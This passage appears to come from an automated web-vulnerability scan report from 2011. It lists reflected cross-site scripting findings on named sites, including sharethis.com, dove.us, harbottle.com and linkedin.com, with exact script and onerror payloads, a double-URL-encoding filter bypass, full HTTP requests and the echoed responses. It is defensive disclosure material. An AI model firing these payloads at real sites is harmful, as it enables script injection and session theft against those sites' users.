Content-Type: text/html

__nbcsnasadops.doSCallback26c64<script>alert(1)</script>321541649f9({ "cookie":{"s_nr":"1313446468300","JSESSIONID":"96CD1AEC186AFFCEEE1A9069E6B37A5F","s_vi":"[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]"}});

3.76. http://wd.sharethis.com/api/getCount2.php [cb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wd.sharethis.com
Path:	/api/getCount2.php

Issue detail

The value of the cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e05fc%3balert(1)//177df2a42e6 was submitted in the cb parameter. This input was echoed as e05fc;alert(1)//177df2a42e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /api/getCount2.php?cb=stButtons.processCBe05fc%3balert(1)//177df2a42e6&url=http%3A%2F%2Fwww.tenzing.com%2Fatg-ecommerce-hosting.asp%3Futm_source%3DPG0008-ATG-Solutions%26utm_campaign%3D001%26utm_content%3D01%26utm_term%3D%252BATG%2520%252Bsolutions%26utm_medium%3DPPC HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==; __uset=yes

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Tue, 06 Sep 2011 15:32:13 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 277

(function(){stButtons.processCBe05fc;alert(1)//177df2a42e6({"error":true,"errorMessage":"Epic Fail","ourl":"http:\/\/www.tenzing.com\/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_
...[SNIP]...

3.77. http://www.dove.us/Products/Hair/ [ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.dove.us
Path:	/Products/Hair/

Issue detail

The value of the ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41eb5"><script>alert(1)</script>fe65f901e8 was submitted in the ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Products/Hair/?ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7=41eb5"><script>alert(1)</script>fe65f901e8 HTTP/1.1
Host: www.dove.us
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dove.us/Products/Hair/?ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7=1
Cookie: ASP.NET_SessionId=p00w4n55ylvqfa45ehz13x45

Response

3.78. http://www.dove.us/Products/Hair/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.dove.us
Path:	/Products/Hair/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba088"><script>alert(1)</script>d91bc007f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Products/Hair/?ba088"><script>alert(1)</script>d91bc007f7=1 HTTP/1.1
Host: www.dove.us
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

3.79. http://www.harbottle.com/hnl/pages/hnl_search2.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.harbottle.com
Path:	/hnl/pages/hnl_search2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 353c3><img%20src%3da%20onerror%3dalert(1)>9d536909165a5febf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 353c3><img src=a onerror=alert(1)>9d536909165a5febf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /hnl/pages/hnl_search2.php/353c3><img%20src%3da%20onerror%3dalert(1)>9d536909165a5febf?search=xss HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl.php?gclid=
Cache-Control: max-age=0
Origin: http://www.harbottle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:44:52 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5158
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
<a href=http://www.harbottle.com/hnl/preview/pages/353c3><img src=a onerror=alert(1)>9d536909165a5febf.php class=fineprint style="text-decoration:none">
...[SNIP]...

3.80. http://www.harbottle.com/hnl/pages/hnl_search2.php [search parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.harbottle.com
Path:	/hnl/pages/hnl_search2.php

Issue detail

The value of the search request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c874d"><script>alert(1)</script>742e151d0f9 was submitted in the search parameter. This input was echoed as c874d\"><script>alert(1)</script>742e151d0f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /hnl/pages/hnl_search2.php HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl.php?gclid=
Content-Length: 10
Cache-Control: max-age=0
Origin: http://www.harbottle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic

search=xssc874d"><script>alert(1)</script>742e151d0f9

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:44:44 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 11217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<base href=http:/
...[SNIP]...
<input type="text" name=search id="txt-search-fld" class="txt-search" value="xssc874d\"><script>alert(1)</script>742e151d0f9" />
...[SNIP]...

3.81. http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.harbottle.com
Path:	/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 136b4><img%20src%3da%20onerror%3dalert(1)>d7f0728306f was submitted in the REST URL parameter 4. This input was echoed as 136b4><img src=a onerror=alert(1)>d7f0728306f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hnl/pages/hnl_search2.php/136b4><img%20src%3da%20onerror%3dalert(1)>d7f0728306f?search=xss HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __utma=7854507.756042197.1315345754.1315345754.1315345754.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345754.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:45 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5152
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
<a href=http://www.harbottle.com/hnl/preview/pages/136b4><img src=a onerror=alert(1)>d7f0728306f.php class=fineprint style="text-decoration:none">
...[SNIP]...

3.82. http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.harbottle.com
Path:	/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 70e82<img%20src%3da%20onerror%3dalert(1)>070b3549546 was submitted in the REST URL parameter 4. This input was echoed as 70e82<img src=a onerror=alert(1)>070b3549546 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf70e82<img%20src%3da%20onerror%3dalert(1)>070b3549546?search=xss HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __utma=7854507.756042197.1315345754.1315345754.1315345754.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345754.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:49 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5219
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
<img src=a onerror=prompt(document.location)>9d536909165a5febf70e82<img src=a onerror=alert(1)>070b3549546.php class=fineprint style="text-decoration:none">
...[SNIP]...

3.83. http://www.harbottle.com/hnl/pages/hnl_search2.php/a [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.harbottle.com
Path:	/hnl/pages/hnl_search2.php/a

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload b2a8a><img%20src%3da%20onerror%3dalert(1)>2ab92f55609 was submitted in the REST URL parameter 4. This input was echoed as b2a8a><img src=a onerror=alert(1)>2ab92f55609 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hnl/pages/hnl_search2.php/ab2a8a><img%20src%3da%20onerror%3dalert(1)>2ab92f55609 HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(%22E-Mail?%22)%3E9d536909165a5febf?search=xss

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:25 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5153
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
<a href=http://www.harbottle.com/hnl/preview/pages/ab2a8a><img src=a onerror=alert(1)>2ab92f55609.php class=fineprint style="text-decoration:none">
...[SNIP]...

3.84. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.harbottle.com
Path:	/hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg

Issue detail

The value of REST URL parameter 5 is copied into the name of an HTML tag attribute. The payload 7efde><img%20src%3da%20onerror%3dalert(1)>d1b7aafafe7 was submitted in the REST URL parameter 5. This input was echoed as 7efde><img src=a onerror=alert(1)>d1b7aafafe7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg7efde><img%20src%3da%20onerror%3dalert(1)>d1b7aafafe7 HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(%22E-Mail?%22)%3E9d536909165a5febf?search=xss

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:26 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5179
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
<a href=http://www.harbottle.com/hnl/preview/pages/Chambers 2011 Firm Logo.jpg7efde><img src=a onerror=alert(1)>d1b7aafafe7.php class=fineprint style="text-decoration:none">
...[SNIP]...

3.85. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.harbottle.com
Path:	/hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 1e850><img%20src%3da%20onerror%3dalert(1)>dd18401005a was submitted in the REST URL parameter 5. This input was echoed as 1e850><img src=a onerror=alert(1)>dd18401005a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hnl/pages/hnl_search2.php/pix/1e850><img%20src%3da%20onerror%3dalert(1)>dd18401005a HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(%22E-Mail?%22)%3E9d536909165a5febf?search=xss

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:31 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5152
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
<a href=http://www.harbottle.com/hnl/preview/pages/1e850><img src=a onerror=alert(1)>dd18401005a.php class=fineprint style="text-decoration:none">
...[SNIP]...

3.86. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.harbottle.com
Path:	/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload e2a6e><img%20src%3da%20onerror%3dalert(1)>39a70330b58 was submitted in the REST URL parameter 5. This input was echoed as e2a6e><img src=a onerror=alert(1)>39a70330b58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hnl/pages/hnl_search2.php/pix/e2a6e><img%20src%3da%20onerror%3dalert(1)>39a70330b58 HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(%22E-Mail?%22)%3E9d536909165a5febf?search=xss

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:31 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5152
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
<a href=http://www.harbottle.com/hnl/preview/pages/e2a6e><img src=a onerror=alert(1)>39a70330b58.php class=fineprint style="text-decoration:none">
...[SNIP]...

3.87. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.harbottle.com
Path:	/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif

Issue detail

The value of REST URL parameter 5 is copied into the name of an HTML tag attribute. The payload 17276><img%20src%3da%20onerror%3dalert(1)>abf137323f7 was submitted in the REST URL parameter 5. This input was echoed as 17276><img src=a onerror=alert(1)>abf137323f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hnl/pages/hnl_search2.php/pix/L500%20Logo.gif17276><img%20src%3da%20onerror%3dalert(1)>abf137323f7 HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(%22E-Mail?%22)%3E9d536909165a5febf?search=xss

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:26 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5165
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
<a href=http://www.harbottle.com/hnl/preview/pages/L500 Logo.gif17276><img src=a onerror=alert(1)>abf137323f7.php class=fineprint style="text-decoration:none">
...[SNIP]...

3.88. http://www.harbottle.com/hnl/pages/pubs/479 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.harbottle.com
Path:	/hnl/pages/pubs/479

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b38f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed437b2915b was submitted in the REST URL parameter 4. This input was echoed as b38f5\"><script>alert(1)</script>ed437b2915b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /hnl/pages/pubs/479b38f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed437b2915b HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=7854507

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:14 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 12483

<p><font color=red><b>Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\"><script>alert(1)</script>ed437b29
...[SNIP]...
<img src="pix/headers/Publications.jpg" alt="banner image - Publications1055:479b38f5\"><script>alert(1)</script>ed437b2915b" />
...[SNIP]...

3.89. http://www.harbottle.com/hnl/pages/pubs/479 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.harbottle.com
Path:	/hnl/pages/pubs/479

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 345e0%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef416c8577e6 was submitted in the REST URL parameter 4. This input was echoed as 345e0--><script>alert(1)</script>f416c8577e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /hnl/pages/pubs/479345e0%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef416c8577e6 HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=7854507

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:18 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 12502

<p><font color=red><b>Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '><script>alert(1)</script>f416c8577e
...[SNIP]...
<script>alert(1)</script>f416c8577e6 -->
...[SNIP]...

3.90. http://www.linkedin.com/countserv/count/share [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.linkedin.com
Path:	/countserv/count/share

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 25dc9<img%20src%3da%20onerror%3dalert(1)>4460fcf0bcf was submitted in the url parameter. This input was echoed as 25dc9<img src=a onerror=alert(1)>4460fcf0bcf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /countserv/count/share?url=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php25dc9<img%20src%3da%20onerror%3dalert(1)>4460fcf0bcf HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie="v=1&e6907e29-3b50-4659-95ed-c5124b8e731f"; visit=G

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:33:10 GMT
Content-Length: 155

IN.Tags.Share.handleCount({"count":0,"url":"http:\/\/www.readwriteweb.com\/enterprise\/2010\/11\/oracle.php25dc9<img src=a onerror=alert(1)>4460fcf0bcf"});

3.91. http://www.sapient.com/en-us/search.html [search parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sapient.com
Path:	/en-us/search.html

Issue detail

